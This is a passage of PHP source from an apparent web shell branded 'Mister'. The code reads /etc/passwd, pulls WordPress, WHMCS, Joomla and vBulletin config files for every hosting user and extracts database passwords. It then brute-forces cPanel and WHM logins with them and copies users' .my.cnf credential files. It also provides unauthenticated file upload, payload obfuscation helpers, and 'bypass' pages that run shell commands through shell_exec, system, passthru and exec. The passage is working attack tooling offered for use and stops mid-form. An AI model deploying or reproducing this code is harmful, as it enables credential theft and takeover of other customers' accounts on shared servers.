  1488. $ar1=explode($marqueurFinLien, $ar0[1]);
  1489. $ar=trim($ar1[0]);
  1490. return $ar;
  1491. }
  1492.  
  1493. if(isset($_POST['sm']))
  1494.  
  1495. {
  1496. echo "<span style='color:white'>U CAN COPY AND PAST /ETC/PASSWD</span><br>";
  1497. $ffile=fopen('r.txt','a+');
  1498.  
  1499.  
  1500. $r= 'http://'.$_SERVER['SERVER_NAME'].DIRname($_SERVER['SCRIPT_NAME'])."/MKcpanel/";
  1501. $re=$r;
  1502. $confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
  1503.  
  1504. $users=file("/etc/passwd");
  1505. foreach($users as $user)
  1506. {
  1507.  
  1508. $str=explode(":",$user);
  1509. $usersss=$str[0];
  1510. foreach($confi as $co)
  1511. {
  1512.  
  1513.  
  1514. $uurl=$re.$usersss.$co;
  1515. $uel=$uurl;
  1516.  
  1517. $ch = curl_init();
  1518.  
  1519. curl_setopt($ch, CURLOPT_URL, $uel);
  1520. curl_setopt($ch, CURLOPT_HEADER, 1);
  1521. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1522. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1523. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  1524. $result['EXE'] = curl_exec($ch);
  1525. curl_close($ch);
  1526. $uxl=$result['EXE'];
  1527.  
  1528.  
  1529. if($uxl && preg_match('/table_prefix/i',$uxl))
  1530. {
  1531.  
  1532. echo "<div align=center><table width=60% ><tr><td align=center> <span> $usersss  </span><span style='color:#0000F0'>USER'S WEBSITE CMS IS WORDPRESS </span></td></tr></table>";
  1533.  
  1534.  echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  1535. if(!empty($dbp))
  1536. $pass=$dbp."\n";
  1537. fwrite($ffile,$pass);
  1538.  
  1539. }
  1540. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  1541. {
  1542.  
  1543. echo "<div align=center><table width=60% ><tr><td align=center><span>  $usersss  </span> <span style='color:#0000F0'>USER'S WEBSITE WHMCS </span></td></tr></table>";
  1544.  
  1545. echo $dbp=entre2v2($uxl,"db_password = '","';");
  1546. if(!empty($dbp))
  1547. $pass=$dbp."\n";
  1548. fwrite($ffile,$pass);
  1549.  
  1550. }
  1551.  
  1552.  
  1553. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  1554. {
  1555.  
  1556. echo "<div align=center><table width=60% ><tr><td align=center><span>  $usersss  </span> <span style='color:#0000F0'>USER'S  WEBSITE CMS IS JOOMLA </span></td></tr></table>";
  1557.  
  1558. echo $db=entre2v2($uxl,"password = '","';");
  1559. if(!empty($db))
  1560. $pass=$db."\n";
  1561. fwrite($ffile,$pass);
  1562. }
  1563. elseif($uxl && preg_match('/admincpDIR/i',$uxl))
  1564. {
  1565.  
  1566. echo "<div align=center><table width=60% ><tr><td align=center><span>  $usersss  </span> <span style='color:#0000F0'>USER'S WEBSITE CMS IS VBULLETIN </span></td></tr></table>";
  1567.  
  1568. echo $db=entre2v2($uxl,"password'] = '","';");
  1569. if(!empty($db))
  1570. $pass=$db."\n";
  1571. fwrite($ffile,$pass);
  1572.  
  1573. }
  1574. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  1575. {
  1576.  
  1577. echo "<div align=center><table width=60% ><tr><td align=center><span style='color:#0000F0'> GOT CONFIG FILE FOR UNKNWON CMS FOR USER</span><span> $usersss  </span></td></tr></table>";
  1578.  
  1579. echo $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  1580. if(!empty($db))
  1581. $pass=$db."\n";
  1582. fwrite($ffile,$pass);
  1583. }
  1584. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1585. {
  1586.  
  1587. echo "<div align=center><table width=60% ><tr><td align=center><span>  $usersss </span> user's config file for unknwon cms </span></td></tr></table>";
  1588.  
  1589. echo $db=entre2v2($uxl,"dbpass = '","';");
  1590. if(!empty($db))
  1591. $pass=$db."\n";
  1592. fwrite($ffile,$pass);
  1593. }
  1594. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1595. {
  1596.  
  1597. echo "<div align=center><table width=60% ><tr><td align=center><span style='color:#0000F0'>  GOT CONFIG FILE FOR UNKNWON CMS OF USER </span><span>$usersss  </span></td></tr></table>";
  1598.  
  1599. echo $db=entre2v2($uxl,"dbpass = '","';");
  1600. if(!empty($db))
  1601. $pass=$db."\n";
  1602. fwrite($ffile,$pass);
  1603.  
  1604. }
  1605. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1606. {
  1607.  
  1608. echo "<div align=center><table width=60% ><tr><td align=center><span>  $usersss </span> <span style='color:#0000F0'> USER'S CONFIG FILE FOR UNKNWON CMS </span></td></tr></table>";
  1609.  
  1610. echo $db=entre2v2($uxl,"dbpass = \"","\";");
  1611. if(!empty($db))
  1612. $pass=$db."\n";
  1613. fwrite($ffile,$pass);
  1614. }
  1615. }
  1616. }
  1617. }
  1618. $data  = $_GET['data'];
  1619. if($data == 'data'){
  1620.  
  1621. $filename = $_FILES['file']['name'];
  1622. $filetmp  = $_FILES['file']['tmp_name'];
  1623.  
  1624. echo "<form method='POST' enctype='multipart/form-data'>
  1625.     <input type='file'name='file'>
  1626.     <input type='submit' value='data' class='Mister-button'>
  1627. </form>";
  1628. MOVE_UPLOADED_FILE($filetmp,$filename);
  1629. }
  1630. ?>
  1631. <span style='color:#0000F0;font-size:18px;'>CPANEL CRACKER</span>
  1632. <form method=post>
  1633. <input type=submit name=cpanel value="AUTO USERNAME/PASSWORD LOADING CPANEL CRACKER" class="Mister-button"><p><?php if(isset($_POST['cpanel'])){?>
  1634. <form method=post><div align=center><table>
  1635. <span>WANT TO BRUTE <select name="op" class="input"> <option name="op" value="cp">CPANEL</option>
  1636. <option name="op" value="whm">WHMPANEL</option></table><p>
  1637. <td class="Mister-Tabl"><textarea class="input" style="width:50%;height:200px;" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
  1638. foreach($users as $user)
  1639. {
  1640. $str=explode(":",$user);
  1641. echo $str[0]."\n";
  1642. }
  1643. ?></textarea></td><td class="Mister-Tabl"><textarea class="input" style="width:50%;height:200px;" rows=20 cols=25 name=passwords >
  1644. <?php
  1645.  
  1646. $d=getcwd()."/r.txt";
  1647. $pf=file($d);
  1648. foreach($pf as $rt)
  1649. {
  1650. $str=explode('\n',$rt);
  1651. echo trim($str[0])."\n";
  1652. } ?></textarea></td><p>
  1653. <input type=submit name=cpanelcracking value="START"  class="Mister-button"></form><br><br>
  1654. <?php
  1655. }
  1656. ?>
  1657. <?php
  1658. error_reporting(0);
  1659. $connect_timeout=5;
  1660. set_time_limit(0);
  1661.  
  1662. $userl=$_POST['usernames'];
  1663. $passl=$_POST['passwords'];
  1664. $attack=$_POST['op'];
  1665. $target = "localhost";
  1666.  
  1667. if(isset($_POST['cpanelcracking']))
  1668. {
  1669. if($userl!=="" && $passl!=="")
  1670. {
  1671. if($_POST["op"]=="cp")
  1672. {
  1673. $cracked=$_POST['crack'];
  1674. @fopen($cracked,'a');
  1675. echo "<br><span>......NOW WE ARE ATTACKING CPANELS....PLEASE WAIT TILL THE END OF PROCESS </span>\n";
  1676.  
  1677.  
  1678. }
  1679. elseif($_POST["op"]=="whm")
  1680. {
  1681. @fopen($cracked,'a');
  1682. echo "<br><span>......NOW WE ARE ATTACKING WHM PANEL....PLEASE WAIT TILL THE END OF PROCESS</span>";
  1683.  
  1684. }
  1685.  
  1686. function cpanel($host,$user,$pass,$timeout){
  1687. $ch = curl_init();
  1688. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  1689. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1690. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1691. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1692. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1693. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1694. $data = curl_exec($ch);
  1695. if ( curl_errno($ch) == 0 ){
  1696. echo "<table width=100% ><tr><td align=center><font color=#FFFFFF >==================================</font><font color=red > $user </font><font color=#FFFFFF >cracked with </font><font color=red > $pass </font> <font color=#FFFFFF >==================================</font></b></td></tr></table>";
  1697. }
  1698. curl_close($ch);}
  1699.  
  1700. $userlist=explode("\n",$userl);
  1701. $passlist=explode("\n",$passl);
  1702.  
  1703. if ($attack == "cp")
  1704. {
  1705. foreach ($userlist as $user) {
  1706. echo "<div align=center><table width=80% ><tr><td align=center><font color=red size=1>Attacking user $user </font></td></tr></table>";
  1707. $finaluser = trim($user);
  1708. foreach ($passlist as $password ) {
  1709. $finalpass = trim($password);
  1710. cpanel($target,$finaluser,$finalpass,$connect_timeout);
  1711. }
  1712. }
  1713. }
  1714. function whm($host,$user,$pass,$timeout){
  1715. $ch = curl_init();
  1716. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
  1717. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1718. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1719. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1720. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1721. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1722. $data = curl_exec($ch);
  1723. if ( curl_errno($ch) == 0 ){
  1724. echo "<table width=100% ><tr><td align=center><font color=#FFFFFF >==================================</font><font color=red > $user </font><font color=#FFFFFF >cracked with </font><font color=red > $pass </font> <font color=#FFFFFF >==================================</font></b></td></tr></table>";
  1725. }
  1726. curl_close($ch);}
  1727. $userlist=explode("\n",$userl);
  1728. $passlist=explode("\n",$passl);
  1729.  
  1730. if ($attack == "whm")
  1731. {
  1732. foreach ($userlist as $user) {
  1733. echo "<table width=80% ><tr><td align=center><span style='color:#0000F0'>USER UNDER ATTACK IS $user </span></td></tr></table>";
  1734. $finaluser = trim($user);
  1735. foreach ($passlist as $password ) {
  1736. $finalpass = trim($password);
  1737.  
  1738. whm($target,$finaluser,$finalpass,$connect_timeout);
  1739. }
  1740. }
  1741. }
  1742. }
  1743. elseif($userl=="")
  1744. {
  1745. echo "<span style='color:red'>USERLIST FIELD </span><br>";
  1746. }
  1747. elseif($passl=="")
  1748. {
  1749.  
  1750. echo "<span style='color:#0000F0'>PLEASE PUT PASSWORDS IN PAASWORD LIST FIELD</span><br>";
  1751. }
  1752. }
  1753. $data  = $_GET['data'];
  1754. if($data == 'data'){
  1755. $filename = $_FILES['file']['name'];
  1756. $filetmp  = $_FILES['file']['tmp_name'];
  1757.  
  1758. echo "<form method='POST' enctype='multipart/form-data'>
  1759.     <input type='file'name='file' />
  1760.     <input type='submit' value='DATA' class='Mister-button'>
  1761. </form>";
  1762. MOVE_UPLOADED_FILE($filetmp,$filename);
  1763. }
  1764. //////// FOOTER
  1765. $FOTTER2 = "<footer class='MK-footer'>";  
  1766. echo ''. $FOTTER2 .'' ;
  1767. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  1768. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  1769. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1770. $SERVERIP1 = "SERVER IP :";
  1771. echo ''. $SERVERIP1 .'' ;
  1772. $SPAN2 = "<span style='color:#FFFFFF;'>";
  1773. $SPAN3 = "</span>";
  1774. echo ''. $SPAN2 .'' ;
  1775. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  1776. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1777. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  1778. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  1779. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  1780. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1781. $HOSTOWNED1 = "HOST OWNED :";
  1782. echo ''. $HOSTOWNED1 .'' ;
  1783. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  1784. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  1785. echo ''. $REPORTERROR .'</a></span></footer>';
  1786. echo ''. $THEEND .'' ;
  1787. exit;
  1788. }
  1789. ///////// CPANNELS
  1790. if ($_GET["Mister"] == "AutoCp"){
  1791.     echo "<br><center><nav class='social'><ul>
  1792. <li><a href='?Mister=cpanelBrut'>Turbo Cpanel Brut Force</a></li>
  1793. <li><a href='?Mister=Brutmailers'>Gmail & Hotmail Brute Force</a></li>
  1794. <li><a href='?Mister=AutoCp'>Auto Cpanel Finder/Cracker</a></li>
  1795. </ul></nav></center>";
  1796. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>AUTO CPANEL FINDER/CRACKER</span></nav><br><div class=content><center>";
  1797. @ini_set('display_errors',0);
  1798. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  1799.     $ar0=explode($marqueurDebutLien, $text);
  1800.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  1801.     return trim($ar1[0]);
  1802. }
  1803.  
  1804. echo "<center>";
  1805. $d0mains = @file('/etc/named.conf');
  1806. $domains = scandir("/var/named");
  1807.  
  1808. if ($domains or $d0mains)
  1809. {
  1810.     $domains = scandir("/var/named");
  1811.     if($domains) {
  1812. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  1813. $count=1;
  1814. $dc = 0;
  1815. $list = scandir("/var/named");
  1816. foreach($list as $domain){
  1817. if(strpos($domain,".db")){
  1818. $domain = str_replace('.db','',$domain);
  1819. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1820. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  1821. $path = getcwd();
  1822.  
  1823. if (is_readable($dirz)) {
  1824. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  1825. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  1826. $password=entre2v2($p,'password="','"');
  1827. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
  1828. $dc++;
  1829. }
  1830.  
  1831. }
  1832. }
  1833. echo '</table>';
  1834. $total = $dc;
  1835. echo '<br><div class="result">TOTAL CPANEL FOUND = '.$total.'</h3><br />';
  1836. echo '</center>';
  1837. }else{
  1838. $d0mains = @file('/etc/named.conf');
  1839.     if($d0mains) {
  1840. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  1841. $count=1;
  1842. $dc = 0;
  1843. $mck = array();
  1844. foreach($d0mains as $d0main){
  1845.     if(@eregi('zone',$d0main)){
  1846.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1847.         flush();
  1848.         if(strlen(trim($domain[1][0])) >2){
  1849.             $mck[] = $domain[1][0];
  1850.         }
  1851.     }
  1852. }
  1853. $mck = array_unique($mck);
  1854. $usr = array();
  1855. $dmn = array();
  1856. foreach($mck as $o) {
  1857.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  1858.     $usr[] = $infos['name'];
  1859.     $dmn[] = $o;
  1860. }
  1861. array_multisort($usr,$dmn);
  1862. $dt = file('/etc/passwd');
  1863. $passwd = array();
  1864. foreach($dt as $d) {
  1865.     $r = explode(':',$d);
  1866.     if(strpos($r[5],'home')) {
  1867.         $passwd[$r[0]] = $r[5];
  1868.     }
  1869. }
  1870. $l=0;
  1871. $j=1;
  1872. foreach($usr as $r) {
  1873. $dirz = '/home/'.$r.'/.my.cnf';
  1874. $path = getcwd();
  1875. if (is_readable($dirz)) {
  1876. copy($dirz, ''.$path.'/'.$r.'.txt');
  1877. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  1878. $password=entre2v2($p,'password="','"');
  1879. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  1880. $dc++;
  1881.                 flush();
  1882.                 $l=$l?0:1;
  1883.                 $j++;
  1884.                 }
  1885.             }
  1886.             }
  1887. echo '</table>';
  1888. $total = $dc;
  1889. echo '<br><div class="result">TOTAL CPANEL FOUND = '.$total.'</h3><br />';
  1890. echo '</center>';
  1891.  
  1892. }
  1893. }else{
  1894. echo "<div class='result'><font color='#FF0000'>ERROR</font><br><font color='white'>/var/named</font> or <font color='white'>etc/named.conf</font><font color='red'> Not Accessible!</font></div>";
  1895. }
  1896. //////// FOOTER
  1897. $FOTTER2 = "<footer class='MK-footer'>";  
  1898. echo ''. $FOTTER2 .'' ;
  1899. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  1900. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  1901. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1902. $SERVERIP1 = "SERVER IP :";
  1903. echo ''. $SERVERIP1 .'' ;
  1904. $SPAN2 = "<span style='color:#FFFFFF;'>";
  1905. $SPAN3 = "</span>";
  1906. echo ''. $SPAN2 .'' ;
  1907. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  1908. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1909. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  1910. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  1911. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  1912. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1913. $HOSTOWNED1 = "HOST OWNED :";
  1914. echo ''. $HOSTOWNED1 .'' ;
  1915. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  1916. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  1917. echo ''. $REPORTERROR .'</a></span></footer>';
  1918. echo ''. $THEEND .'' ;
  1919.  
  1920. exit ; }
  1921. ///////////// BASE64CRY
  1922. if ($_GET["Mister"] == "Base64Cry"){
  1923. echo '<br><center><nav class="social"><ul>
  1924. <li><a href="?Mister=string">Encoder</a></li>
  1925. <li><a href="?Mister=Base64Cry">Base64 Decrypt V2.0</a></li>
  1926. <li><a href="?Mister=obfuscate">Php Obfuscate</a></li>
  1927. <li><a href="?Mister=HashId">Hash Identification</a></li>
  1928. </ul></nav></center>';
  1929. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>BASE64 CRYPT & DECRYPT V2.0</span></nav><br><div class=content><center>";
  1930. {$text = $_POST['code'];
  1931. echo' <form method="post"><textarea cols=80 rows=9 name="code" class="input" style="height:100px; width:50%;">
  1932. </textarea><br><br>
  1933. <select  name="ope">
  1934. <option value="base64">BASE64</option ><option value="gzinflate"> STR_ROT13 - GZINFLATE - BASE64 </option>
  1935. <option value="str">STR_ROT13 - GZINFLATE - STR_ROT13 - BASE64</option > < /select>
  1936. <input class="Mister-button" type="submit" name="submit" value="ENCRYPT">
  1937. <input class="Mister-button" type="submit" name="submits" value="DECRYPT">
  1938. </form > ';
  1939.     $submit = $_POST['submit'];
  1940.     if (isset($submit)) {
  1941.         $op = $_POST["ope"];
  1942.         switch ($op) {
  1943.         case 'base64':
  1944.             $codi = base64_encode($text);
  1945.             break;
  1946.         case 'str':
  1947.             $codi = (base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  1948.             break;
  1949.         case 'gzinflate':
  1950.             $codi = base64_encode(gzdeflate(str_rot13($text)));
  1951.             break;
  1952.         default:
  1953.             break;
  1954.         }
  1955.     }
  1956.  
  1957.     $submit = $_POST['submits'];
  1958.     if (isset($submit)) {
  1959.         $op = $_POST["ope"];
  1960.         switch ($op) {
  1961.         case 'base64':
  1962.             $codi = base64_decode($text);
  1963.             break;
  1964.         case 'str':
  1965.             $codi = str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  1966.             break;
  1967.         case 'gzinflate':
  1968.             $codi = str_rot13(gzinflate(base64_decode($text)));
  1969.             break;
  1970.         default:
  1971.             break;
  1972.         }
  1973.     }
  1974. echo '<textarea cols=80 rows=9 class="input" style="height:150px; width:50%;" readonly>'.$codi.'</textarea></center>'; }
  1975. ///// FOOTER
  1976. $FOTTER2 = "<footer class='MK-footer'>";  
  1977. echo ''. $FOTTER2 .'' ;
  1978. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  1979. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  1980. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1981. $SERVERIP1 = "SERVER IP :";
  1982. echo ''. $SERVERIP1 .'' ;
  1983. $SPAN2 = "<span style='color:#FFFFFF;'>";
  1984. $SPAN3 = "</span>";
  1985. echo ''. $SPAN2 .'' ;
  1986. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  1987. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1988. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  1989. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  1990. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  1991. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1992. $HOSTOWNED1 = "HOST OWNED :";
  1993. echo ''. $HOSTOWNED1 .'' ;
  1994. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  1995. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  1996. echo ''. $REPORTERROR .'</a></span></footer>';
  1997. echo ''. $THEEND .'' ;
  1998. exit ;}
  1999. ////////////////// BYPASS
  2000. if ($_GET["Mister"] == "Bypassuser"){
  2001. //////// FOOTER
  2002. $FOTTER2 = "<footer class='MK-footer'>";  
  2003. echo ''. $FOTTER2 .'' ;
  2004. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2005. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2006. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2007. $SERVERIP1 = "SERVER IP :";
  2008. echo ''. $SERVERIP1 .'' ;
  2009. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2010. $SPAN3 = "</span>";
  2011. echo ''. $SPAN2 .'' ;
  2012. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  2013. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2014. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2015. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2016. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2017. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2018. $HOSTOWNED1 = "HOST OWNED :";
  2019. echo ''. $HOSTOWNED1 .'' ;
  2020. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2021. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2022. echo ''. $REPORTERROR .'</a></span></footer>';
  2023. echo ''. $THEEND .'' ;
  2024. echo '<br><center><nav class="social"><ul>
  2025. <li><a href="?Mister=Bypassuser"> Bypass Users Server</a></li>
  2026. <li><a href="?Mister=Bypassetc" >Bypass /etc/passwd </a></li>
  2027. </ul></nav></center>';
  2028. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>BYPASS USERS SERVER </span></nav><br><div class=content><center>";
  2029. echo '
  2030. <div><span style="font-size:10px;  color:#0000F0">
  2031. <p><center><span style="font-size:10px;  color:#0000F0">BYPASS WITH AWK PROGRAM
  2032. <form method="post">
  2033. <input type="submit" value="Bypass" name="awk" class="Mister-button">
  2034. </form>
  2035. </center><br>
  2036. </p>
  2037. <p><center><span style="font-size:10px;  color:#0000F0">BYPASS WITH SYSTEM FUNCTION
  2038. <form method="post">
  2039. <input type="submit" value="Bypass" name="syst" class="Mister-button">
  2040. </form>
  2041. </center><br>
  2042. </p>
  2043. <p><center><span style="font-size:10px;  color:#0000F0">BYPASS WITH PASSTHRU FUNCTION
  2044. <form method="post">
  2045. <input type="submit" value="Bypass" name="passth" class="Mister-button">
  2046. </form>
  2047. </center><br>
  2048. </p>
  2049. <p><center><span style="font-size:10px;  color:#0000F0">BYPASS WITH EXEC FUNCTION
  2050. <form method="post">
  2051. <input type="submit" value="Bypass" name="ex" class="Mister-button">
  2052. </form>
  2053. </center><br>
  2054. </p>
  2055. <p><center><span style="font-size:10px;  color:#0000F0">BYPASS WITH SHELL_EXEC FUNCTION
  2056. <form method="post">
  2057. <input type="submit" value="Bypass" name="shex" class="Mister-button">
  2058. </form>
  2059. </center><br>
  2060. </p><center>';
  2061. //Awk Program //
  2062. if ($_POST['awk']) {
  2063. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2064. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  2065. echo "</textarea><br>";
  2066. echo "
  2067. <br>
  2068. </b>
  2069. <br>
  2070. ";
  2071. }
  2072. echo "</center><center>";
  2073. //SYSTEM FUNCTION
  2074. if ($_POST['syst']) {
  2075. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2076. echo system("ls /var/mail");
  2077. echo "</textarea><br>";
  2078. echo "
  2079. <br>
  2080. </b>
  2081. <br>
  2082. ";
  2083. }
  2084. echo "</center><center>";
  2085. //PASSTHRU FUNCTION
  2086. if ($_POST['passth']) {
  2087. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2088. echo passthru("ls /var/mail");
  2089. echo "</textarea><br>";
  2090. echo "
  2091. <br>
  2092. </b>
  2093. <br>
  2094. ";
  2095. }
  2096. echo "</center><center>";
  2097. //exec Function
  2098. if ($_POST['ex']) {
  2099. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2100. echo exec("ls /var/mail");
  2101. echo "</textarea><br>";
  2102. echo "
  2103. <br>
  2104. </b>
  2105. <br>
  2106. ";
  2107. }
  2108.  
  2109. echo "</center><center>";
  2110.    
  2111. //exec Function //
  2112. if ($_POST['shex']) {
  2113. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2114. echo shell_exec("ls /var/mail");
  2115. echo "</textarea><br>";
  2116. echo "
  2117. <br>
  2118.  
  2119. </b>
  2120. <br>
  2121. ";
  2122. } exit ;}
  2123. /////////////// BYPASS 2
  2124. if ($_GET["Mister"] == "Bypassetc"){
  2125. echo '<br><center><nav class="social"><ul>
  2126. <li><a href="?Mister=Bypassuser"> Bypass Users Server</a></li>
  2127. <li><a href="?Mister=Bypassetc" >Bypass /etc/passwd </a></li>
  2128. </ul></nav></center>';
  2129. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>BYPASS /ETC/PASSWD </span></nav><center><br><div class=content>";
  2130. echo '
  2131. <p><center><span style="font-size:10px;  color:#0000F0">Bypass with System Function
  2132. <form method="post">
  2133. <input type="submit" value="Bypass" name="syst" class="Mister-button">
  2134. </form>
  2135. </center><br>
  2136. </p>
  2137.  
  2138. <p><center><span style="font-size:10px;  color:#0000F0">Bypass with Passthru Function
  2139. <form method="post">
  2140. <span style="font-size:10px;  color:#0000F0">
  2141. <input type="submit" value="Bypass" name="passth" class="Mister-button">
  2142. </form>
  2143. </center><br>
  2144. </p>
  2145.  
  2146. <p><center><span style="font-size:10px;  color:#0000F0">Bypass with exec Function
  2147. <form method="post">
  2148. <input type="submit" value="Bypass" name="ex" class="Mister-button">
  2149. </form>
  2150. </center><br>
